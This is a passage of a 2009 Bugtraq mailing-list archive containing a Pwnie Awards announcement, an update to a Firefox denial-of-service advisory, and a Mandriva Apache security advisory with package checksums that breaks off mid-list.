ICAgICA9IC0xIEVJTlRSIChJbnRlcnJ1cHRlZCBzeXN0ZW0gY2FsbCkNCjI2NDU2IDwuLi4gZnV0
ZXggcmVzdW1lZD4gKSAgICAgICAgICAgICA9IC0xIEVJTlRSIChJbnRlcnJ1cHRlZCBzeXN0ZW0g
Y2FsbCkNCjI2NDU3IDwuLi4gZnV0ZXggcmVzdW1lZD4gKSAgICAgICAgICAgICA9IC0xIEVJTlRS
IChJbnRlcnJ1cHRlZCBzeXN0ZW0gY2FsbCkNCjI2NDYxIDwuLi4gZnV0ZXggcmVzdW1lZD4gKSAg
ICAgICAgICAgICA9IC0xIEVJTlRSIChJbnRlcnJ1cHRlZCBzeXN0ZW0gY2FsbCkNCjI2NDYwIDwu
Li4gc2VsZWN0IHJlc3VtZWQ+ICkgICAgICAgICAgICA9ID8gRVJFU1RBUlROT0hBTkQgKFRvIGJl
IHJlc3RhcnRlZCkNCjI2NDYyIDwuLi4gcnRfc2lncHJvY21hc2sgcmVzdW1lZD4gW0hVUCBJTlQg
UVVJVCBQSVBFIEFMUk0gVEVSTSBUU1RQXSwgOCkgPSAwDQoNCldpdGggS2luZCBSZWdhcmRzLA0K
DQpOaWtvbGFvcyBSYW5nb3MNCkUtTWFpbDoga2NvcGVbYXRdZ29vZ2xlbWFpbC5jb20NCg0K
--0016364d1d916cb72a046e39b7ea--

From - Mon Jul 13 18:03:27 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b67
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40811-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4B94CECF0A
for <lists@securityspace.com>; Thu,  9 Jul 2009 10:57:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1296C23710F; Thu,  9 Jul 2009 08:39:02 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29892 invoked from network); 9 Jul 2009 02:42:40 -0000
Date: Wed, 8 Jul 2009 22:42:42 -0400
From: Alexander Sotirov <alex@sotirov.net>
To: bugtraq@securityfocus.com
Cc: info@pwnie-awards.org
Subject: Pwnie Awards 2009
Message-ID: <20090709024242.GA20567@MacBook.local>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="u3/rZRmxL6MmkK24"
Content-Disposition: inline
User-Agent: Mutt/1.5.19 (2009-01-05)
Status: RO


--u3/rZRmxL6MmkK24
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

The Pwnie Awards ceremony will return for the third consecutive year to the
BlackHat USA conference in Las Vegas. The award ceremony will take place
during the BlackHat reception on Wed, July 29.

The Pwnie Awards is an annual awards ceremony celebrating the achievements and
failures of security researchers and the wider security community in the past
year. We're currently accepting nominations in nine award categories:

 * Best Server-Side Bug
 * Best Client-Side Bug
 * Mass 0wnage
 * Most Innovative Research
 * Lamest Vendor Response
 * Most Overhyped Bug
 * Best Song
 * Most Epic FAIL (new for 2008)
 * Lifetime Achievement award for hackers over 30 (new for 2008)

The deadline for nominations is Wed, July 15. To submit a nomination,
visit the Pwnie Awards site at http://pwnie-awards.org/

For more last minute information, follow @PwnieAwards on Twitter,
http://twitter.com/PwnieAwards

For questions, please email info@pwnie-awards.org

Alexander Sotirov
Dino Dai Zovi

Pwnie Awards 2009

--u3/rZRmxL6MmkK24
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (Darwin)

iEYEARECAAYFAkpVWSIACgkQ6MVeVwnnQQQCpwCgpBwVZf/V+TUbMd0tFagzRc2A
axkAoJaTPhKlayTe/cAarN6kpE9iE/RU
=s7sw
-----END PGP SIGNATURE-----

--u3/rZRmxL6MmkK24--

From - Mon Jul 13 18:03:27 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b68
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40812-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C5A7DECF14
for <lists@securityspace.com>; Thu,  9 Jul 2009 11:27:49 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 48A891438BC; Thu,  9 Jul 2009 09:11:16 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2856 invoked from network); 9 Jul 2009 10:20:40 -0000
Resent-Cc: recipient list not shown: ;
Resent-Date: Thu, 9 Jul 2009 04:20:44 -0600
Resent-Message-Id: <200907091020.n69AKiLV008211@mx2.securityfocus.com>
Date: Thu, 9 Jul 2009 12:19:47 +0200
From: Thierry Zoller <Thierry@zoller.lu>
X-Priority: 3 (Normal)
Message-ID: <1309593173.20090709121947@Zoller.lu>
To: bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: Update: [TZO-27-2009] Firefox Denial of Service (Keygen)
Resent-From: Thierry Zoller <Thierry@zoller.lu>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
Status: RO


Update
------
Unfortunately the Denial of Service condition has not been fixed
with the new versions/builds and according to tickets filled
under the bugzilla ID the impact of this bug has changed since
version 3.5. [1]

Hence the list of affected products now is :
- All versions below Firefox 3.5

[1]
--- Comment #28 from PBForeman <dufalcon@yahoo.com>  2009-07-08 09:14:00 PDT ---
When FF3.5 is open, cpu eventually runs 99%, using over 100,000K of memory.
Closing FF does not stop the cpu or memory usage. Closing with Task Manager is
the only way to exit FF.  Previous versions of FF all ran stable, problem
started with 3.5.  Closing and restarting does not solve the problem. Removing
program and reinstalling clean does not solve anything. Same settings were used
from previous version to install FF3.5. Once cpu maxes out, FF ties up entire computer.




From - Mon Jul 13 18:03:27 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b69
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40813-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id D4940ECE92
for <lists@securityspace.com>; Thu,  9 Jul 2009 11:45:37 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0D014143739; Thu,  9 Jul 2009 09:28:03 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7596 invoked from network); 9 Jul 2009 15:15:55 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:149 ] apache
Date: Thu, 09 Jul 2009 17:16:00 +0200
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1MOvLs-0002AN-8V@titan.mandriva.com>
Status: RO


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:149
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : apache
 Date    : July 9, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in apache:
 
 The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy
 module in the Apache HTTP Server before 2.3.3, when a reverse proxy
 is configured, does not properly handle an amount of streamed data
 that exceeds the Content-Length value, which allows remote attackers
 to cause a denial of service (CPU consumption) via crafted requests
 (CVE-2009-1890).
 
 Fix a potential Denial-of-Service attack against mod_deflate or other
 modules, by forcing the server to consume CPU time in compressing a
 large file after a client disconnects (CVE-2009-1891).
 
 This update provides fixes for these vulnerabilities.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1890
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1891
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 864257e773e8847901aa0f2e7b92e35c  2008.1/i586/apache-base-2.2.8-6.5mdv2008.1.i586.rpm
 2ef1924cb3803af418dcb0e12b05da5a  2008.1/i586/apache-devel-2.2.8-6.5mdv2008.1.i586.rpm
 a3ec4a3eda586d7b52e65e0dc715e96b  2008.1/i586/apache-htcacheclean-2.2.8-6.5mdv2008.1.i586.rpm
 ad46ee6bd081b35e89bf00b707e34e66  2008.1/i586/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.i586.rpm
 1500f492f8aa95f82ce8062fb79371bf  2008.1/i586/apache-mod_cache-2.2.8-6.5mdv2008.1.i586.rpm
 0bcf1f2cc7c220a5fcbe212e8d4c791a  2008.1/i586/apache-mod_dav-2.2.8-6.5mdv2008.1.i586.rpm
 f50830d873e8a948ebb7435068ac7723  2008.1/i586/apache-mod_dbd-2.2.8-6.5mdv2008.1.i586.rpm
 53e657db85cbbb5a46991b7a7e7ba6eb  2008.1/i586/apache-mod_deflate-2.2.8-6.5mdv2008.1.i586.rpm
 0de02351654d1691aca8027fcd162076  2008.1/i586/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.i586.rpm
 9b8cb72ea384949d1afdb2a458edde43  2008.1/i586/apache-mod_file_cache-2.2.8-6.5mdv2008.1.i586.rpm
 b01299df82912bd055e8a4a5107f18ba  2008.1/i586/apache-mod_ldap-2.2.8-6.5mdv2008.1.i586.rpm
 de8b3be73e223946bc59267b2b061041  2008.1/i586/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.i586.rpm
 f8d35075b25dfa8349e1a4903d17751b  2008.1/i586/apache-mod_proxy-2.2.8-6.5mdv2008.1.i586.rpm
 0c16a26c9c164197211a13c4ffcc3b33  2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.i586.rpm
 d70ff82e41072270e0f6af937d06ee9b  2008.1/i586/apache-mod_ssl-2.2.8-6.5mdv2008.1.i586.rpm
 05c16bce9cefcb99c1db3834f6853f89  2008.1/i586/apache-modules-2.2.8-6.5mdv2008.1.i586.rpm
 8e3ee38379f1e301a1e41a489a92147b  2008.1/i586/apache-mod_userdir-2.2.8-6.5mdv2008.1.i586.rpm
 a3ff073681b969b46638ff46a6313fc6  2008.1/i586/apache-mpm-event-2.2.8-6.5mdv2008.1.i586.rpm
 c89bb0192cc036054e3a4367fababce1  2008.1/i586/apache-mpm-itk-2.2.8-6.5mdv2008.1.i586.rpm
 410f034dd2818b264a09a036bd35f9a2  2008.1/i586/apache-mpm-prefork-2.2.8-6.5mdv2008.1.i586.rpm
 476303bf479cc1c249b6fa69f32742d2  2008.1/i586/apache-mpm-worker-2.2.8-6.5mdv2008.1.i586.rpm
 23ef5826c0e49f577d8d04254f61a923  2008.1/i586/apache-source-2.2.8-6.5mdv2008.1.i586.rpm 
 5d895c7c364db08fff0372c3654d1ccd  2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 ed8541532eb77b813ec71f35bc3b1a7f  2008.1/x86_64/apache-base-2.2.8-6.5mdv2008.1.x86_64.rpm
 98000923f5eec7c767dafd94ab0967bc  2008.1/x86_64/apache-devel-2.2.8-6.5mdv2008.1.x86_64.rpm
 7c81d6ed41e96370e3c4498a6a082714  2008.1/x86_64/apache-htcacheclean-2.2.8-6.5mdv2008.1.x86_64.rpm
 074ce4664eb6fc96f0444de96bdd17cf  2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm
 8306c6084cabfd7e36207a53489093df  2008.1/x86_64/apache-mod_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 eaf9d071b93a0f478e242253b031c2bd  2008.1/x86_64/apache-mod_dav-2.2.8-6.5mdv2008.1.x86_64.rpm
 d02221dbdac77e5fa1ee1710f5e946dd  2008.1/x86_64/apache-mod_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm
 574bb4b1e11c16210e99be0ce029aa10  2008.1/x86_64/apache-mod_deflate-2.2.8-6.5mdv2008.1.x86_64.rpm
 c3196491613788da66c222dfd1d7608e  2008.1/x86_64/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 9eeb2a7b68bc178dc7917c362d89b5ff  2008.1/x86_64/apache-mod_file_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 5dfc3a189d4e70dde834a84c3a5141fa  2008.1/x86_64/apache-mod_ldap-2.2.8-6.5mdv2008.1.x86_64.rpm
 66696247e7ae1a919e0e80fa43544b92  2008.1/x86_64/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.x86_64.rpm
 6374972abfd91ab03fe74ac0b9b5fbbd  2008.1/x86_64/apache-mod_proxy-2.2.8-6.5mdv2008.1.x86_64.rpm
 6606ff6d4ae5d09716a69938e2b944c6  2008.1/x86_64/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.x86_64.rpm
 23ba0203d6876a376e1a1e22e887b54c  2008.1/x86_64/apache-mod_ssl-2.2.8-6.5mdv2008.1.x86_64.rpm
 b7077a42c6b823d7a744e5ecbe306242  2008.1/x86_64/apache-modules-2.2.8-6.5mdv2008.1.x86_64.rpm
 fa1ab5a1c4190191c88fb83bf07d3926  2008.1/x86_64/apache-mod_userdir-2.2.8-6.5mdv2008.1.x86_64.rpm
 abb9e82feea59e2d913dab61c0c1be2f  2008.1/x86_64/apache-mpm-event-2.2.8-6.5mdv2008.1.x86_64.rpm
 a7e021179bcabb2e6725d7488fac33cf  2008.1/x86_64/apache-mpm-itk-2.2.8-6.5mdv2008.1.x86_64.rpm
 64ec4ecc7f6f6557eb95ba61017e00a8  2008.1/x86_64/apache-mpm-prefork-2.2.8-6.5mdv2008.1.x86_64.rpm
 5955bfd23bfff88bea08d049bbf1ff88  2008.1/x86_64/apache-mpm-worker-2.2.8-6.5mdv2008.1.x86_64.rpm
 91e233e5e4874e2beaa6eff728d1a8df  2008.1/x86_64/apache-source-2.2.8-6.5mdv2008.1.x86_64.rpm 
 5d895c7c364db08fff0372c3654d1ccd  2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 d363852286bffcc1f16be74529c16d8e  2009.0/i586/apache-base-2.2.9-12.3mdv2009.0.i586.rpm
 5958b4410e39655375a3fb06704e86cb  2009.0/i586/apache-devel-2.2.9-12.3mdv2009.0.i586.rpm
 0d57fe115977bdb79f5550f68e6f0a7c  2009.0/i586/apache-htcacheclean-2.2.9-12.3mdv2009.0.i586.rpm
 4d3907f8abc34e0398d2a67df9185f1e  2009.0/i586/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.i586.rpm
 3cf8641644943ef13cff4b6af29cfacb  2009.0/i586/apache-mod_cache-2.2.9-12.3mdv2009.0.i586.rpm
 8adb06cd1b0c1364c30c761c49b50d33  2009.0/i586/apache-mod_dav-2.2.9-12.3mdv2009.0.i586.rpm
 a0bfc1e6a7d9f8862c65c69f759cd093  2009.0/i586/apache-mod_dbd-2.2.9-12.3mdv2009.0.i586.rpm
 b335c39fe37988f3de26537262dd6b9d  2009.0/i586/apache-mod_deflate-2.2.9-12.3mdv2009.0.i586.rpm
 f3e11730ca6381f782f60ea7ad703b33  2009.0/i586/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.i586.rpm
 8ec10efb81f40dd11e744856a30f1a9e  2009.0/i586/apache-mod_file_cache-2.2.9-12.3mdv2009.0.i586.rpm
 ca822b5f7ce60c3b2e8ac8ef9c87ea07  2009.0/i586/apache-mod_ldap-2.2.9-12.3mdv2009.0.i586.rpm
 6ef2fe37d9056fd08fe10f17f72eb131  2009.0/i586/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.i586.rpm
 17e4a0cb1a25f1a1dd34d64527cd69ff  2009.0/i586/apache-mod_proxy-2.2.9-12.3mdv2009.0.i586.rpm
 f757375865df48bde5fde177bc53f176  2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.i586.rpm
 afa87773aa3485eb3d08482f6c66b723  2009.0/i586/apache-mod_ssl-2.2.9-12.3mdv2009.0.i586.rpm
 b9b4cebe20f782cf6d61de932ae775fe  2009.0/i586/apache-modules-2.2.9-12.3mdv2009.0.i586.rpm
 7caa399d860dce728c05e2a1bbb37b02  2009.0/i586/apache-mod_userdir-2.2.9-12.3mdv2009.0.i586.rpm
 991dcf92749cedff7f2b7ea110cbc26d  2009.0/i586/apache-mpm-event-2.2.9-12.3mdv2009.0.i586.rpm
 6631e8492a2cfb0c294a844d4437896b  2009.0/i586/apache-mpm-itk-2.2.9-12.3mdv2009.0.i586.rpm
 334050ac21bee98ba6cb3275f378c07f  2009.0/i586/apache-mpm-peruser-2.2.9-12.3mdv2009.0.i586.rpm
 616f75510fbf462edf494fdf6456f2f0  2009.0/i586/apache-mpm-prefork-2.2.9-12.3mdv2009.0.i586.rpm
 ec4bc21290ccb97b3f4a89fe395f961e  2009.0/i586/apache-mpm-worker-2.2.9-12.3mdv2009.0.i586.rpm
 fd5db56435be568aa94e4f256f083640  2009.0/i586/apache-source-2.2.9-12.3mdv2009.0.i586.rpm 
 befd4b86100340246045938e9668b133  2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 12bb10b4fefbe9a41290619b396bbc27  2009.0/x86_64/apache-base-2.2.9-12.3mdv2009.0.x86_64.rpm
 f9480a489f5fc7bf6f09601c66786166  2009.0/x86_64/apache-devel-2.2.9-12.3mdv2009.0.x86_64.rpm
 194e19c4192104e1ce86ccae92bc3678  2009.0/x86_64/apache-htcacheclean-2.2.9-12.3mdv2009.0.x86_64.rpm
 83df7eff4ccf56a27dfab4b7e5e55def  2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm
 7e17cd33c2f77598a55b27de9a1f272f  2009.0/x86_64/apache-mod_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 49b4f14a69e1fe814892d8c1235fff3b  2009.0/x86_64/apache-mod_dav-2.2.9-12.3mdv2009.0.x86_64.rpm
 51bf4942dcdfce90ca8d921fcf721d20  2009.0/x86_64/apache-mod_dbd-2.2.9-12.3mdv2009.0.x86_64.rpm
 1b95ecf1dd6d8509d764428c2f64f023  2009.0/x86_64/apache-mod_deflate-2.2.9-12.3mdv2009.0.x86_64.rpm
 2a269581f79f4261357d78c3a32f5ac9  2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 b471904247a8663f8894956b02bd3095  2009.0/x86_64/apache-mod_file_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 2f9667e46b23c991813607a53310e5d8  2009.0/x86_64/apache-mod_ldap-2.2.9-12.3mdv2009.0.x86_64.rpm
 184b807180f72d4399a4039f6f08d7d8  2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.3mdv2009.0.x86_64.rpm
 cfc41078bac18b0512a44756eb31c727  2009.0/x86_64/apache-mod_proxy-2.2.9-12.3mdv2009.0.x86_64.rpm
 4d7e1318e9ca104dce782997d94734f3  2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.3mdv2009.0.x86_64.rpm
 d3613cf215e1617d53761395591c0ee5  2009.0/x86_64/apache-mod_ssl-2.2.9-12.3mdv2009.0.x86_64.rpm
 663d9a17a0a131c46ad70aebb9d286a1  2009.0/x86_64/apache-modules-2.2.9-12.3mdv2009.0.x86_64.rpm
 4b88b69bb42109d60ed86b3aa0cf6cf0  2009.0/x86_64/apache-mod_userdir-2.2.9-12.3mdv2009.0.x86_64.rpm
 c0212892e5ccc905bf9c8c27c0fc55a4  2009.0/x86_64/apache-mpm-event-2.2.9-12.3mdv2009.0.x86_64.rpm
 845a766d32686438a04562898d658f66  2009.0/x86_64/apache-mpm-itk-2.2.9-12.3mdv2009.0.x86_64.rpm
 d841f9b7e7898e99f16ecc668a829890  2009.0/x86_64/apache-mpm-peruser-2.2.9-12.3mdv2009.0.x86_64.rpm
 55bb3d32f6ad363872d9c27e6eab04a6  2009.0/x86_64/apache-mpm-prefork-2.2.9-12.3mdv2009.0.x86_64.rpm
 2ace6623bedb6f5d29d8b79505361ef1  2009.0/x86_64/apache-mpm-worker-2.2.9-12.3mdv2009.0.x86_64.rpm
 aa3f27740d94b8d2ada54592b3c1deb2  2009.0/x86_64/apache-source-2.2.9-12.3mdv2009.0.x86_64.rpm 
 befd4b86100340246045938e9668b133  2009.0/SRPMS/apache-2.2.9-12.3mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 43de323093117584b6f981e3440893d9  2009.1/i586/apache-base-2.2.11-10.4mdv2009.1.i586.rpm
 e4a751411c51ebf3db63c5a70ba555ee  2009.1/i586/apache-devel-2.2.11-10.4mdv2009.1.i586.rpm
 b013be5a696f29cdd2c0c6da0799dd08  2009.1/i586/apache-htcacheclean-2.2.11-10.4mdv2009.1.i586.rpm
 672318a22cff862b606d6f1721650a9b  2009.1/i586/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.i586.rpm
 cd318fc1bf8be7106f1c92f0e23f2faa  2009.1/i586/apache-mod_cache-2.2.11-10.4mdv2009.1.i586.rpm
 f8354758215da0db366c942bde4465fe  2009.1/i586/apache-mod_dav-2.2.11-10.4mdv2009.1.i586.rpm
 d04f091350b5737c35217b3963cdba21  2009.1/i586/apache-mod_dbd-2.2.11-10.4mdv2009.1.i586.rpm
 94ba7bfec4c32d194a157ae285cbfbe6  2009.1/i586/apache-mod_deflate-2.2.11-10.4mdv2009.1.i586.rpm
 fed83efa0e9315b5f6060535424046fd  2009.1/i586/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.i586.rpm
 1b9b91a3a25036edfebe5bcd7f603fd5  2009.1/i586/apache-mod_file_cache-2.2.11-10.4mdv2009.1.i586.rpm
 f9b090f9e1d5303171884ef6972232e7  2009.1/i586/apache-mod_ldap-2.2.11-10.4mdv2009.1.i586.rpm
 7af5d73ac41cf7d8f54251e0d14a6eed  2009.1/i586/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.i586.rpm
 509e9bedb5f91343a676045f90bef558  2009.1/i586/apache-mod_proxy-2.2.11-10.4mdv2009.1.i586.rpm
 0c68c2755ad96c79f85a155bc079dd74  2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.i586.rpm
 fdd37129c8ce847680456f5c08550968  2009.1/i586/apache-mod_ssl-2.2.11-10.4mdv2009.1.i586.rpm
 7549e14f72e5c8d3d6b408d52ef8a38c  2009.1/i586/apache-modules-2.2.11-10.4mdv2009.1.i586.rpm
 bc066f7e9cd881dfc170953094dc8319  2009.1/i586/apache-mod_userdir-2.2.11-10.4mdv2009.1.i586.rpm
 d32db804ae96533ca4c7b245eda01f98  2009.1/i586/apache-mpm-event-2.2.11-10.4mdv2009.1.i586.rpm
 868f2aaa6ef53c7c60b376202944e2aa  2009.1/i586/apache-mpm-itk-2.2.11-10.4mdv2009.1.i586.rpm
 681854ce611a93ec864c58785ab541f5  2009.1/i586/apache-mpm-peruser-2.2.11-10.4mdv2009.1.i586.rpm
 8e71ace64ffd0c8c37c83a0a12e1afbe  2009.1/i586/apache-mpm-prefork-2.2.11-10.4mdv2009.1.i586.rpm
 5e88459f25f50a6c3cde05a445b32594  2009.1/i586/apache-mpm-worker-2.2.11-10.4mdv2009.1.i586.rpm
 611db0cf3570f9f0377586bda61e59b0  2009.1/i586/apache-source-2.2.11-10.4mdv2009.1.i586.rpm 
 6e8db38ec06bfd8756037dec8ea71ca4  2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 f140d32d2a4083fb5ee324b7572279f2  2009.1/x86_64/apache-base-2.2.11-10.4mdv2009.1.x86_64.rpm
 383bab22e1d9a9c61baeb10c3972443d  2009.1/x86_64/apache-devel-2.2.11-10.4mdv2009.1.x86_64.rpm
 007f4193dc68dcd34d48ab58bfd615ed  2009.1/x86_64/apache-htcacheclean-2.2.11-10.4mdv2009.1.x86_64.rpm
 428b7be1ac06755588bb28dc90b914ae  2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm
 82158b3767bdb31fea07f5a442fcebd4  2009.1/x86_64/apache-mod_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 085eb05ff541f4699b0d2764b24c023a  2009.1/x86_64/apache-mod_dav-2.2.11-10.4mdv2009.1.x86_64.rpm
 7b831282bf0889312f8198c358393332  2009.1/x86_64/apache-mod_dbd-2.2.11-10.4mdv2009.1.x86_64.rpm
 f78e3d86a7b6af8b46c1864fcabd5455  2009.1/x86_64/apache-mod_deflate-2.2.11-10.4mdv2009.1.x86_64.rpm
 b985d6447095085c7713902a7253dc07  2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 26e49e2067e11ea114dc8ddcac3d51c6  2009.1/x86_64/apache-mod_file_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 e4395af2defe1b01229fe1c4887a5e3b  2009.1/x86_64/apache-mod_ldap-2.2.11-10.4mdv2009.1.x86_64.rpm
 08c9824c79e51e956619dd1c1f5b2391  2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.4mdv2009.1.x86_64.rpm
 125634357057ef66b5a96c3f6d59f887  2009.1/x86_64/apache-mod_proxy-2.2.11-10.4mdv2009.1.x86_64.rpm
 48f5cce6d04c185bc8f74e9440d42d49  2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.x86_64.rpm
 f5353fee0655a944233e95dc542475fc  2009.1/x86_64/apache-mod_ssl-2.2.11-10.4mdv2009.1.x86_64.rpm
 181766999217f26744e0b2a7179f074c  2009.1/x86_64/apache-modules-2.2.11-10.4mdv2009.1.x86_64.rpm
 9c75cd439b962a013d0a12be52eac839  2009.1/x86_64/apache-mod_userdir-2.2.11-10.4mdv2009.1.x86_64.rpm
 5ff7131c77436bd966c50618a23fac1f  2009.1/x86_64/apache-mpm-event-2.2.11-10.4mdv2009.1.x86_64.rpm
 2df4ee8eff3152a1c12fdfec6d09a4c7  2009.1/x86_64/apache-mpm-itk-2.2.11-10.4mdv2009.1.x86_64.rpm
 3e2e9c63c293ac81654e2792d941a8e5  2009.1/x86_64/apache-mpm-peruser-2.2.11-10.4mdv2009.1.x86_64.rpm
 db758092a06528c21fe8cb89dc72e44a  2009.1/x86_64/apache-mpm-prefork-2.2.11-10.4mdv2009.1.x86_64.rpm
 fbd4fa29c8e7fab05e6cd9ee73061e53  2009.1/x86_64/apache-mpm-worker-2.2.11-10.4mdv2009.1.x86_64.rpm
 2a3aa46f4a5ef9eb0f4fc60b8688b6d4  2009.1/x86_64/apache-source-2.2.11-10.4mdv2009.1.x86_64.rpm 
 6e8db38ec06bfd8756037dec8ea71ca4  2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm

 Corporate 3.0:
 efc4dd61f307ba7ca3e78b702d14766a  corporate/3.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm
 85ef73c40780432a49b5b52eaa10174c  corporate/3.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm
 f8668cb4d5d5a7aeeec18ac9089ce224  corporate/3.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm
 9c7411c194f42dc2dda22e73b87871ac  corporate/3.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm
 addfed70aa6f5b9b95423166a9d9d2d0  corporate/3.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm
 23d16c62736006e63f2290c6474a3c3f  corporate/3.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm
